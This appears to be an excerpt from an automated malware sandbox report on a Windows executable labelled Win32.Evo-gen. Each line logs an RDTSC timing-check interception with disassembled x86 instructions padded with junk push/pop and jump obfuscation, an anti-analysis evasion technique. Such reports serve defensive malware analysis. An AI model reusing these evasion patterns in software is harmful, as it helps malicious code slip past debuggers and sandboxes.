                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA181C second address: DA1820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9D6AE second address: D9D6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA1820 second address: DA182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA2766 second address: DA27CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC734882078h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push esi 0x00000011 je 00007FC734882076h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 nop 0x0000001a xor ebx, 652B1A5Ah 0x00000020 push 00000000h 0x00000022 sub dword ptr [ebp+1244A874h], esi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FC734882078h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2CB1h], edx 0x0000004a mov edi, dword ptr [ebp+122D1C75h] 0x00000050 push eax 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC734882081h 0x00000059 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA27CD second address: DA27D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA3736 second address: DA373C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA373C second address: DA3740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA5711 second address: DA5715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA4A80 second address: DA4A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA57B9 second address: DA57C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC734882076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA777B second address: DA7793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F784h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA78CB second address: DA78CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA78CF second address: DA78D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA8744 second address: DA8753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC734882076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA78D9 second address: DA78E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA8753 second address: DA8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA78E3 second address: DA78E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DAA65D second address: DAA663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DAA663 second address: DAA701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007FC734E5F77Ch 0x0000000d nop 0x0000000e jnc 00007FC734E5F77Bh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FC734E5F778h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr [ebp+1244C80Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FC734E5F778h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 jmp 00007FC734E5F786h 0x00000057 jns 00007FC734E5F77Ch 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jnl 00007FC734E5F77Ch 0x00000065 push edi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DAB612 second address: DAB616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DAB616 second address: DAB69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 clc 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC734E5F778h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 sub di, EAEAh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC734E5F778h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007FC734E5F77Eh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007FC734E5F780h 0x00000053 jmp 00007FC734E5F77Dh 0x00000058 popad 0x00000059 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DAA86D second address: DAA871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DB07D9 second address: DB0839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jne 00007FC734E5F776h 0x00000014 pop ecx 0x00000015 push esi 0x00000016 jmp 00007FC734E5F780h 0x0000001b pop esi 0x0000001c popad 0x0000001d nop 0x0000001e js 00007FC734E5F780h 0x00000024 jmp 00007FC734E5F77Ah 0x00000029 push 00000000h 0x0000002b sub bl, 00000060h 0x0000002e push 00000000h 0x00000030 sub bh, 00000014h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC734E5F782h 0x0000003b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DB0839 second address: DB0856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882089h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DB0856 second address: DB085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DAF977 second address: DAF97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DB7EB1 second address: DB7EC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FC734E5F776h 0x0000000e jp 00007FC734E5F776h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DB8156 second address: DB815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DB815A second address: DB8160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC2C9 second address: DBC2D3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC2D3 second address: DBC30E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC734E5F776h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FC734E5F795h 0x00000013 jnc 00007FC734E5F78Fh 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC30E second address: DBC314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC314 second address: DBC319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC319 second address: DBC365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734882085h 0x00000008 jmp 00007FC73488207Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007FC73488207Eh 0x00000018 pop esi 0x00000019 jmp 00007FC73488207Ah 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC73488207Fh 0x0000002a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC45F second address: DBC486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F785h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBC486 second address: DBC48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBF7E8 second address: DBF7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DBF7EC second address: DBF7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007FC734882076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D5970C second address: D59717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC734E5F776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D59717 second address: D5971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D5B19C second address: D5B1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Eh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D5B1AE second address: D5B1C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D5B1C6 second address: D5B1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC34AC second address: DC34C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jnl 00007FC734882076h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop esi 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3A96 second address: DC3AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F789h 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3AB4 second address: DC3AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 jne 00007FC73488207Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3BF6 second address: DC3BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3BFC second address: DC3C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3C00 second address: DC3C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3C08 second address: DC3C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3C11 second address: DC3C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FC734E5F780h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3D8C second address: DC3D96 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC734882076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3D96 second address: DC3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC734E5F77Dh 0x0000000c jmp 00007FC734E5F787h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3F0E second address: DC3F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC734882076h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 jng 00007FC734882088h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pushad 0x00000021 popad 0x00000022 jnp 00007FC734882076h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC73488207Bh 0x00000030 jnp 00007FC734882076h 0x00000036 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC3F5C second address: DC3F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC4248 second address: DC4265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop eax 0x00000008 jl 00007FC73488207Ah 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 ja 00007FC73488207Eh 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC44F9 second address: DC44FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DC44FE second address: DC453C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC734882087h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FC73488207Eh 0x00000012 jmp 00007FC73488207Fh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D54900 second address: D54906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D54906 second address: D5490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DCC021 second address: DCC048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC734E5F786h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FC734E5F776h 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D951EF second address: D7C353 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f lea eax, dword ptr [ebp+12479FE2h] 0x00000015 jc 00007FC73488207Ch 0x0000001b push eax 0x0000001c je 00007FC734882085h 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FC73488207Bh 0x0000002a popad 0x0000002b mov dword ptr [esp], eax 0x0000002e movsx ecx, ax 0x00000031 call dword ptr [ebp+1244A926h] 0x00000037 js 00007FC73488207Ah 0x0000003d push eax 0x0000003e pushad 0x0000003f popad 0x00000040 pop eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 jmp 00007FC73488207Eh 0x00000049 pop edi 0x0000004a push ecx 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d js 00007FC734882076h 0x00000053 pop ecx 0x00000054 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D952C9 second address: D952D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D958FC second address: D95901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D95901 second address: D95928 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FC734E5F78Bh 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D960E3 second address: D960E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9649D second address: D964A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D964A1 second address: D964A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D964A7 second address: D964B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D964B1 second address: D964F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d jne 00007FC73488207Ch 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FC734882088h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007FC734882076h 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D96620 second address: D96662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dx, FD79h 0x00000011 lea eax, dword ptr [ebp+12479FE2h] 0x00000017 xor di, 64B3h 0x0000001c nop 0x0000001d je 00007FC734E5F787h 0x00000023 push edi 0x00000024 jmp 00007FC734E5F77Fh 0x00000029 pop edi 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
